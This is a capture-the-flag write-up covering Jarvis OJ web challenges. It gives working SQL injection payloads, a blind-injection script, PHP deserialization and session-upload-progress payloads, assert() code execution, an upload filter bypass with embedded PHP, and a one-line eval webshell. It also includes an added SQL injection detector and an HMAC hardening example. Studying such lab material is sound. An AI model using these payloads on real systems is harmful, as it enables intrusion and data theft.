Jarvis OJ (web write-up)
api调用 (API call)
This one is the XXE vulnerability in the Slim framework; I did it by following this blog post, lol:
https://www.leavesongs.com/PENETRATION/slim3-xxe.html
simple injection
username and password are the injection points; the rest is working out how to inject.
The challenge filters spaces, but /**/ gets around that.
Confirm that the admin table exists:
username=admin'/**/or/**/exists(select/**/*/**/from/**/admin)#&password=1'#
The username and password columns exist:
username=admin'/**/or/**/exists(select/**/username,password/**/from/**/admin)#&password=1'#
Confirm there is only one record:
username=admin'/**/or/**/exists(select/**/count(*)/**/from/**/admin)#&password=1'#
Work out the password length:
username=user'/**/or/**/(select/**/length(password)/**/from/**/admin)=32#&password=1'#
What's left is blind injection; here's the script:
# coding: utf-8
import requests

url = "http://web.jarvisoj.com:32787/login.php"
wrong_msg = "密码错误"   # response text seen only when the injected condition holds
chars = "abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ"

print('start!')
password = ""
for i in range(1, 33):   # the password is 32 characters long
    for j in chars:
        data = {'username': "user'/**/or/**/mid((select/**/password/**/from/**/admin),%s,1)='%s'#" % (i, j),
                'password': "1'#"}
        res = requests.post(url, data=data).text
        if wrong_msg in res:   # character i of the password is j
            password += j
            print(password)
            break
print(password)
print('end!')
Result:
This is obviously an md5 hash; crack it, then log in with the plaintext.
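As a defender-side complement (added here, not part of the original write-up): a small normaliser that undoes the URL encoding and the /**/ comment-as-whitespace trick before pattern matching, run over constructed request lines that mirror the payloads above. The log format, sample lines and patterns are my assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample request lines (not real logs). Line 2 and 3 mirror the
# /**/ payloads used above; line 4 is the same trick with the comments URL-encoded.
SAMPLE_LOG = [
    "POST /login.php username=admin&password=hunter2",
    "POST /login.php username=admin'/**/or/**/exists(select/**/*/**/from/**/admin)%23&password=1'%23",
    "POST /login.php username=user'/**/or/**/mid((select/**/password/**/from/**/admin),1,1)='a'%23&password=1'%23",
    "POST /login.php username=admin%27%2F%2A%2A%2For%2F%2A%2A%2F1%3D1%23&password=x",
]

COMMENT_WS = re.compile(r"/\*.*?\*/")          # inline comment used as a space
SUSPICIOUS = re.compile(
    r"'\s*or\s+(exists|mid|\(select|\d+\s*=\s*\d+)|\bselect\b.*\bfrom\b", re.I)

def normalize(param):
    """URL-decode, treat inline comments as whitespace, collapse whitespace runs."""
    s = unquote_plus(param)
    s = COMMENT_WS.sub(" ", s)
    return re.sub(r"\s+", " ", s).strip()

def flag_line(line):
    """Return (param name, normalised value) for the first suspicious
    parameter in a request line, or None when nothing matches."""
    body = line.split(" ", 2)[2]
    for pair in body.split("&"):
        name, _, value = pair.partition("=")
        norm = normalize(value)
        if SUSPICIOUS.search(norm):
            return name, norm
    return None

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        print(flag_line(entry))
```

Matching on the raw parameter instead of the normalised one would miss all three injected lines, which is the point of decoding first.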
WEB?
In this one the front-end JS shows the validation rule:
$.post("checkpass.json", t, function(t){
    self.checkpass(e) ? self.setState({
        errmsg: "Success!!",
        errcolor: b.green400
    }) : (self.setState({
        errmsg: "Wrong Password!!",
        errcolor: b.red400
    }))
})
And its checkpass function looks like this:
function(e){
    if(25!==e.length)
        return !1;
    for(var t=[],n=0;n<25;n++)
        t.push(e.charCodeAt(n));
    for(var r=[325799,309234,317320,327895,298316,301249,330242,289290,273446,337687,258725,267444,373557,322237,344478,362136,331815,315157,299242,305418,313569,269307,338319,306491,351259],o=[[11,13,32,234,236,3,72,237,122,230,157,53,7,225,193,76,142,166,11,196,194,187,152,132,135],[76,55,38,70,98,244,201,125,182,123,47,86,67,19,145,12,138,149,83,178,255,122,238,187,221],[218,233,17,56,151,28,150,196,79,11,150,128,52,228,189,107,219,87,90,221,45,201,14,106,230],[30,50,76,94,172,61,229,109,216,12,181,231,174,236,159,128,245,52,43,11,207,145,241,196,80],[134,145,36,255,13,239,212,135,85,194,200,50,170,78,51,10,232,132,60,122,117,74,117,250,45],[142,221,121,56,56,120,113,143,77,190,195,133,236,111,144,65,172,74,160,1,143,242,96,70,107],[229,79,167,88,165,38,108,27,75,240,116,178,165,206,156,193,86,57,148,187,161,55,134,24,249],[235,175,235,169,73,125,114,6,142,162,228,157,160,66,28,167,63,41,182,55,189,56,102,31,158],[37,190,169,116,172,66,9,229,188,63,138,111,245,133,22,87,25,26,106,82,211,252,57,66,98],[199,48,58,221,162,57,111,70,227,126,43,143,225,85,224,141,232,141,5,233,69,70,204,155,141],[212,83,219,55,132,5,153,11,0,89,134,201,255,101,22,98,215,139,0,78,165,0,126,48,119],[194,156,10,212,237,112,17,158,225,227,152,121,56,10,238,74,76,66,80,31,73,10,180,45,94],[110,231,82,180,109,209,239,163,30,160,60,190,97,256,141,199,3,30,235,73,225,244,141,123,208],[220,248,136,245,123,82,120,65,68,136,151,173,104,107,172,148,54,218,42,233,57,115,5,50,196],[190,34,140,52,160,34,201,48,214,33,219,183,224,237,157,245,1,134,13,99,212,230,243,236,40],[144,246,73,161,134,112,146,212,121,43,41,174,146,78,235,202,200,90,254,216,113,25,114,232,123],[158,85,116,97,145,21,105,2,256,69,21,152,155,88,11,232,146,238,170,123,135,150,161,249,236],[251,96,103,188,188,8,33,39,237,63,230,128,166,130,141,112,254,234,113,250,1,89,0,135,119],[192,206,73,92,174,130,164,95,21,153,82,254,20,133,56,7,163,48,7,206,51,204,136,180,196],[106,63,252,202,153,6,193,146,88,118,78,58,214,168,68,128,68,35,245,144,102,20,194,207,66],[154,98,219,2,13,65,131,185,27,162,214,63,238,248,38,129,170,180,181,96,165,78,121,55,214],[193,94,107,45,83,56,2,41,58,169,120,58,105,178,58,217,18,93,212,74,18,217,219,89,212],[164,228,5,133,175,164,37,176,94,232,82,0,47,212,107,111,97,153,119,85,147,256,130,248,235],[221,178,50,49,39,215,200,188,105,101,172,133,28,88,83,32,45,13,215,204,141,226,118,233,156],[236,142,87,152,97,134,54,239,49,220,233,216,13,143,145,112,217,194,114,221,150,51,136,31,198]],n=0;n<25;n++){
        for(var i=0,a=0;a<25;a++)
            i+=t[a]*o[n][a];
        if(i!==r[n])
            return !1
    }
    return !0
}
So it's a system of 25 linear equations in 25 unknowns; let a script solve it:
import numpy as np

r = [325799,309234,317320,327895,298316,301249,330242,289290,273446,337687,258725,267444,373557,322237,344478,362136,331815,315157,299242,305418,313569,269307,338319,306491,351259]
o = [[11,13,32,234,236,3,72,237,122,230,157,53,7,225,193,76,142,166,11,196,194,187,152,132,135],[76,55,38,70,98,244,201,125,182,123,47,86,67,19,145,12,138,149,83,178,255,122,238,187,221],[218,233,17,56,151,28,150,196,79,11,150,128,52,228,189,107,219,87,90,221,45,201,14,106,230],[30,50,76,94,172,61,229,109,216,12,181,231,174,236,159,128,245,52,43,11,207,145,241,196,80],[134,145,36,255,13,239,212,135,85,194,200,50,170,78,51,10,232,132,60,122,117,74,117,250,45],[142,221,121,56,56,120,113,143,77,190,195,133,236,111,144,65,172,74,160,1,143,242,96,70,107],[229,79,167,88,165,38,108,27,75,240,116,178,165,206,156,193,86,57,148,187,161,55,134,24,249],[235,175,235,169,73,125,114,6,142,162,228,157,160,66,28,167,63,41,182,55,189,56,102,31,158],[37,190,169,116,172,66,9,229,188,63,138,111,245,133,22,87,25,26,106,82,211,252,57,66,98],[199,48,58,221,162,57,111,70,227,126,43,143,225,85,224,141,232,141,5,233,69,70,204,155,141],[212,83,219,55,132,5,153,11,0,89,134,201,255,101,22,98,215,139,0,78,165,0,126,48,119],[194,156,10,212,237,112,17,158,225,227,152,121,56,10,238,74,76,66,80,31,73,10,180,45,94],[110,231,82,180,109,209,239,163,30,160,60,190,97,256,141,199,3,30,235,73,225,244,141,123,208],[220,248,136,245,123,82,120,65,68,136,151,173,104,107,172,148,54,218,42,233,57,115,5,50,196],[190,34,140,52,160,34,201,48,214,33,219,183,224,237,157,245,1,134,13,99,212,230,243,236,40],[144,246,73,161,134,112,146,212,121,43,41,174,146,78,235,202,200,90,254,216,113,25,114,232,123],[158,85,116,97,145,21,105,2,256,69,21,152,155,88,11,232,146,238,170,123,135,150,161,249,236],[251,96,103,188,188,8,33,39,237,63,230,128,166,130,141,112,254,234,113,250,1,89,0,135,119],[192,206,73,92,174,130,164,95,21,153,82,254,20,133,56,7,163,48,7,206,51,204,136,180,196],[106,63,252,202,153,6,193,146,88,118,78,58,214,168,68,128,68,35,245,144,102,20,194,207,66],[154,98,219,2,13,65,131,185,27,162,214,63,238,248,38,129,170,180,181,96,165,78,121,55,214],[193,94,107,45,83,56,2,41,58,169,120,58,105,178,58,217,18,93,212,74,18,217,219,89,212],[164,228,5,133,175,164,37,176,94,232,82,0,47,212,107,111,97,153,119,85,147,256,130,248,235],[221,178,50,49,39,215,200,188,105,101,172,133,28,88,83,32,45,13,215,204,141,226,118,233,156],[236,142,87,152,97,134,54,239,49,220,233,216,13,143,145,112,217,194,114,221,150,51,136,31,198]]
o = np.array(o)
r = np.array(r)
x = np.linalg.solve(o, r)   # solve o * x = r for the 25 character codes
# print(x)
string = ''
for i in x:
    i += 0.5                # round the float solution to the nearest integer
    # print(round(i,0))
    string += chr(int(i))
print(string)
Here I map the computed values to their ASCII characters, and that gives the flag.
神盾局的秘密 (S.H.I.E.L.D.'s secret)
Opening this one shows an image, and the URL parameter turns out to be base64; decoding it gives shield.jpg.
Guess: arbitrary file read.
Try base64-encoding index.php and passing that in, and you get the source of index.php.
The other source files can be found the same way.
index.php
<?php
require_once('shield.php');
$x = new Shield();
isset($_GET['class']) && $g = $_GET['class'];
if (!empty($g)) {
    $x = unserialize($g);
}
echo $x->readfile();
?>
// deserializes the value it receives
shield.php
<?php
//flag is in pctf.php
class Shield {
    public $file;
    function __construct($filename = '') {
        $this -> file = $filename;
    }
    function readfile() {
        if (!empty($this->file) && stripos($this->file,'..')===FALSE
            && stripos($this->file,'/')===FALSE && stripos($this->file,'\\')==FALSE) {
            return @file_get_contents($this->file);
        }
    }
}
?>
// filters .. / \\
// returns the contents of the file it read
showimg.php
<?php
$f = $_GET['img'];
if (!empty($f)) {
    $f = base64_decode($f);
    if (stripos($f,'..')===FALSE && stripos($f,'/')===FALSE && stripos($f,'\\')===FALSE
        && stripos($f,'pctf')===FALSE) {
        readfile($f);
    } else {
        echo "File not found!";
    }
}
?>
// filters .. / \\ pctf
So index.php takes a class parameter, deserializes it, calls readfile() and echoes the result, and the flag is in pctf.php. Reading pctf.php directly through showimg.php is out because of the pctf filter, so the only way is to serialize a Shield object and have index.php read it.
Final payload:
flag在管理员手里 (the flag is in the admin's hands)
This one tests the hash length extension attack; I won't explain the attack itself, just do the challenge. Capturing the request shows role and hsh.
Scanning the back end turns up an index.php~ leak; restoring the file shows:
role is the value passed in the cookie, and hsh is the md5 of the salt concatenated with the reversed role; if role is admin you get the flag.
But we don't know what the salt is, which is where hashpump comes in.
There's a blog post by p神 that explains it in detail:
https://www.cnblogs.com/pcat/p/5478509.html
With the results in hand, take the string below the md5 line, reverse it, convert it to URL encoding, and that's it.
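For contrast, an added example in Python (mine, not from the write-up): the page's tag construction md5(salt . strrev(role)) next to an HMAC version, plus a cookie check that compares in constant time. SALT is a hypothetical placeholder for the server secret we never learn.

```python
import hashlib
import hmac
import os
from urllib.parse import quote, unquote

# Hypothetical server secret; the challenge's real salt is unknown (that is the point).
SALT = os.urandom(16)

def weak_tag(role):
    """The page's scheme: hsh = md5(salt . strrev(role)). MD5 is a plain
    Merkle-Damgard hash, so a tag over secret||message can be extended to
    secret||message||padding||suffix without knowing the secret, which is
    exactly what a length-extension tool like hashpump automates."""
    return hashlib.md5(SALT + role[::-1].encode()).hexdigest()

def strong_tag(role):
    """Hardened replacement: a keyed MAC. HMAC is not length-extendable."""
    return hmac.new(SALT, role.encode(), hashlib.sha256).hexdigest()

def make_cookie(role, tagger=strong_tag):
    """Build the 'role=..; hsh=..' cookie the page describes."""
    return "role=%s; hsh=%s" % (quote(role), tagger(role))

def check_cookie(cookie, tagger=strong_tag):
    """Parse the cookie and verify its tag in constant time; None if invalid."""
    fields = dict(part.strip().split("=", 1) for part in cookie.split(";"))
    role = unquote(fields.get("role", ""))
    if not hmac.compare_digest(tagger(role), fields.get("hsh", "")):
        return None
    return role

if __name__ == "__main__":
    print(check_cookie(make_cookie("guest")))
    print(check_cookie(make_cookie("guest").replace("role=guest", "role=admin")))
```

Both taggers reject a cookie whose role was simply edited; the difference is that only the HMAC version also resists a forged tag for an extended role.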
in a mess
The challenge hints to look at index.phps:
<?php
error_reporting(0);
echo "<!--index.phps-->";
if(!$_GET['id'])
{
    header('Location: index.php?id=1');
    exit();
}
$id=$_GET['id'];
$a=$_GET['a'];
$b=$_GET['b'];
if(stripos($a,'.'))
{
    echo 'Hahahahahaha';
    return ;
}
$data = @file_get_contents($a,'r');
if($data=="1112 is a nice lab!" and $id==0 and strlen($b)>5 and eregi("111".substr($b,0,1),"1114") and substr($b,0,1)!=4)
{
    require("flag.txt");
}
else
{
    print "work harder!harder!harder!";
}
?>
So we have to supply three values, id, a and b: id must compare equal to 0, the file read from a must contain "1112 is a nice lab!", and b must be longer than 5, match "1114" via eregi, but not start with 4.
Passing a string for id bypasses the check, e.g. id=0e12 or id=abd.
For a, use php://input (supposedly the data protocol works too: a=data:,1112 is a nice lab!).
For b, use a %00 truncation: b=%00111111.
Then you see this, and SQL injection starts here; spaces, union, select, from and the table name are filtered.
From the screenshot there are 3 columns, and when I first tried id=1' the error message directly disclosed that the table is content.
So just look at what the columns are.
Then look at the value of context.
RE?
This one completely lost me: UDF privilege escalation? What?
You get a UDF file, put it on the server, then look at the help_me function.
Easy Gallery
Opening this one shows a file upload form, so it should be a file upload challenge.
I tried %00 and other bypasses, none of them let a php file through, so I guessed it wants an image with embedded PHP.
Try appending <?php phpinfo();?> to an image, upload it, then visit it.
(Gotcha: the URL that actually reaches the image is http://web.jarvisoj.com:32785/index.php?page=uploads/<image id>+<image type>)
The result was this, so the back end appends .php to the filename before including it, which means we need a %00 truncation.
After the truncation I found:
A bit of testing showed that <? seems to trigger the WAF, so change the way it's written:
<script language='php'>
phpinfo();
</script>
Upload it and visit it, and there it is.
Chopper
This one's server seems to be down; I could never reach it.
Noting down other people's approach and what it tests.
It should be about proxying. Opening it shows an image and an admin login; clicking through shows that only the admin IP 103.27.76.153 is allowed to log in.
Tried capturing and modifying the request, nothing worked.
In the end it turned out to be a proxy (or is it a cross-site attack?).
Go through the original site to reach an intermediate site; that intermediate site has higher privileges, so it can reach other sites that were originally off limits.
Then you see a "you are closing" page........
Scanning the back end finds robot.txt with two disallows: *.php and *.php.txt.
In the txt there is a one-line webshell, "eval($_POST[360])".
Finally, connect with Chopper (菜刀) and you get the flag.
phpinfo
Reference: this blog post https://chybeta.github.io/2017/07/05/jarvisoj-web-writeup/
Opening this one shows the source.
It tests a deserialization vulnerability, emmm, the hint is very obvious.
There's an OowoO class, a controllable variable mdzz, and two magic methods. Very friendly, but how do we get control of this class?
Look at phpinfo:
session.upload_progress.enabled is On. While an upload is being processed, if the POST includes a variable with the same name as session.upload_progress.name from the ini, PHP detects it and adds a set of data to $_SESSION. So we can write session data through session upload progress, and from there control the OowoO class to do what we want.
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>phpinfo</title>
</head>
<body>
    <form action="http://web.jarvisoj.com:32784/index.php" method="post" enctype="multipart/form-data">
        <input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="123" />
        <input type="file" name="file" />
        <input type="submit" value="go" />
    </form>
</body>
</html>
Submit from this page, capture the request and modify it to do what we want; if you're not familiar with the serialized format you can write a quick script to echo it out, I won't paste it here (runs away).
First find the current file path: capture the request and change filename to |O:5:\"OowoO\":1:{s:4:\"mdzz\";s:36:\"print_r(dirname(/opt/lampp/htdocs));\";}
The backslashes are there to prevent escaping.
Result:
Then list the directory, with filename |O:5:\"OowoO\":1:{s:4:\"mdzz\";s:38:\"print_r(scandir(\"/opt/lampp/htdocs\"));\";}
You can see the file with the flag.
Finally read it out, with filename |O:5:\"OowoO\":1:{s:4:\"mdzz\";s:88:\"print_r(file_get_contents(\"/opt/lampp/htdocs/Here_1s_7he_fl4g_buT_You_Cannot_see.php\"));\";}
flag
inject
The first thing to do on this one is find the source, orz.
Here it's an index.php~ leak:
<?php
require("config.php");
$table = $_GET['table']?$_GET['table']:"test";
$table = Filter($table);
mysqli_query($mysqli,"desc `secret_{$table}`") or Hacker();
$sql = "select 'flag{xxx}' from secret_{$table}";
$ret = sql_query($sql);
echo $ret[0];
?>
You can see that $table is an injection point.
Since it's wrapped in backticks, we need a way to close the backtick.
Look at the database:
?table=test` `union select database() limit 1,1
Tables:
?table=test` `union select group_concat(table_name) from information_schema.tables where table_schema=database() limit 1,1
Then the columns; the catch here is that the back end filters double quotes, so you have to go through them row by row:
?table=test` `union select column_name from information_schema.columns limit 1,1
Finally the flag:
?table=test` `union select group_concat(flagUwillNeverKnow) from secret_flag limit 1,1
babyphp
The challenge mentions git, so I guessed a .git leak, and a scan confirmed it.
Then the source:
<?php
if (isset($_GET['page'])) {
    $page = $_GET['page'];
} else {
    $page = "home";
}
$file = "templates/" . $page . ".php";
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");
assert("file_exists('$file')") or die("That file doesn't exist!");
?>
The source uses assert(), which executes the string it receives as code, and $file is interpolated straight into that string, so we get code execution; use a system function to list the directory first.
There's a templates directory (which was already visible in the leaked source); look into templates.
There's a flag.php; read it.
And the flag is out.
register
This one had a hint, but I couldn't find what country affected, so in the end I followed these write-ups, lol:
https://blog.csdn.net/Ni9htMar3/article/details/73743284#t4
http://mitah.cn/index.php/archives/8/
country affects the response time, so the timing difference can be used for boolean-based blind injection.
Finally get admin's password hash, crack it, log in to the manage page and the flag is there.
图片上传漏洞 (image upload vulnerability)
This one is a CVE; too noob, still couldn't do it, followed these write-ups:
https://www.scanfsec.com/jarvisoj_web_writeup.html#directory056831405803208134
https://www.2cto.com/article/201605/505823.html
phpinfo shows ImageMagick is present; the rest is exploiting that vulnerability.
Generate a one-line webshell with exiftool.
Then upload it.
Then visit y.php and connect with Chopper, but the back end seems to be down??? I could never find y.php.
babyxss
Haven't figured this one out yet; parking the write-up here to work through later (ง •̀_•́)ง
https://blog.csdn.net/littlelittlebai/article/details/78922343